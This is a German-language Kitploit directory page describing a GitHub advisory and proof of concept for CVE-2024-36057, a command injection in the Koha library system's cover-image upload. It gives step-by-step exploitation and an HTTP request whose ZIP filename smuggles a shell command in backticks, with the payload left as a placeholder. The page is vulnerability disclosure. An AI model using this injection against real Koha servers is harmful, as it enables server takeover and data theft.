Skip to content
KitploitKITPLOIT
ToolsBlog
Einreichen
ToolsBlog
Einreichen

Hacking-, PenTest- und Cybersicherheits-Tools für Ihr Sicherheitsarsenal!

Kitploit ist ein Verzeichnis von Hacking-, Cybersicherheits- und Pentesting-Tools. Entdecken Sie die neuesten Projekt-Updates, um Schwachstellen zu finden, Systeme zu analysieren, Tests zu automatisieren und Ihre Sicherheit zu stärken.

··Feeds·Kontakt·Datenschutz·© 2026 Kitploit

Tool-Verzeichnis

Kategorien

Alle Kategorien anzeigen
Loading categories
CVE-2024-36057 — Advisory und Proof-of-Concept für CVE-2024-36057, eine authentifizierte OS-Command-Injection in der Koha-Bibliothekssoftware, die die Ausführung beliebiger Befehle über manipulierte ZIP-Dateinamen demonstriert. | Kitploit
Tools/GitHubGitHub/hacklantic/cve-2024-36057
SchwachstellenanalyseExploitationWebanwendungs-ExploitationPenetrationstests
GitHubhacklantic/cve-2024-36057

CVE-2024-36057

Advisory und Proof-of-Concept für CVE-2024-36057, eine authentifizierte OS-Command-Injection in der Koha-Bibliothekssoftware, die die Ausführung beliebiger Befehle über manipulierte ZIP-Dateinamen demonstriert.

Repository anzeigen
vor 10h 19mNoch nicht geprüft

Beliebteste

Alle anzeigen →

Entdecken Sie die meistgenutzten Tools unserer Community.

Alle Tools erkunden

Durchsuchen Sie unsere Tool-Sammlung

Alle Tools anzeigen →
Teilen

CVE-2024-36057 — Koha-Bibliothekssoftware < 22.05.22 — OS-Befehlsinjektion

CVE-ID: CVE-2024-36057
Produkt: Koha-Bibliothekssoftware
Schwachstellentyp: OS-Befehlsinjektion (CWE-78)
CVSS-Score: 8.7 (Hoch) Authentifiziert
Betroffene Versionen: Unter 22.05.22
Credits: Karolis Narvilas


Beschreibung

Koha ist ein integriertes Open-Source-Bibliothekssystem. In der Funktion zum Hochladen von Titelbildern unter tools/upload-cover-image.pl besteht eine Schwachstelle bezüglich Befehlsinjektion. Die Anwendung verwendet qx/unzip $filename -d $dirname/, um hochgeladene ZIP-Archive zu extrahieren, ohne den Dateinamenparameter zu bereinigen.

Ein authentifizierter Benutzer mit hohen Rechten kann eine ZIP-Datei mit einem bösartigen Dateinamen erstellen, der Backtick-Zeichen enthält, um beliebige Shell-Befehle einzuschleusen, die serverseitig ausgeführt werden, wenn der Benutzer auf „Process Images" klickt.

Auswirkung: Ein entfernter authentifizierter Angreifer kann CVE-2024-36057 ausnutzen, um beliebige Betriebssystembefehle auf dem zugrunde liegenden Server auszuführen, was zu einer vollständigen Kompromittierung des Systems, Datendiebstahl sowie der Einrichtung persistenter Backdoors oder Reverse Shells führt.


Proof-of-Concept (PoC)

  1. Melden Sie sich als Benutzer mit hohen Rechten bei Koha an.
  2. Navigieren Sie zu: https://{domain}/cgi-bin/koha/tools/upload-cover-image.pl
  3. Laden Sie eine normale ZIP-Datei hoch und bearbeiten Sie den Dateinamen mithilfe eines Abfangproxys wie Burp Suite wie unten gezeigt:

Anfrage:

root@kitploit:~
POST /cgi-bin/koha/tools/upload-file.pl?temp=1 HTTP/1.1
Host: {domain}
Cookie: [High-Privilege Session]
Connection: close

------WebKitFormBoundaryP82Da5V6eaQOuBUT
Content-Disposition: form-data; name="file"; filename="execute`<INJECTED_COMMAND>`.zip"
Content-Type: application/x-zip-compressed

<zip file contents>
------WebKitFormBoundaryP82Da5V6eaQOuBUT--

  1. Klicken Sie nach dem erfolgreichen Hochladen der ZIP-Datei auf „Process Images".
  2. Der injizierte Befehl innerhalb der Backticks wird serverseitig ausgeführt. In diesem Beispiel wird eine Reverse Shell auf dem Zielsystem eingerichtet.

Reverse Shell PoC


Referenzen

  • Koha Community - Versionshinweise für v22.05.22
  • MITRE - CVE-2024-36057
  • Hacklantic
Tool herunterladen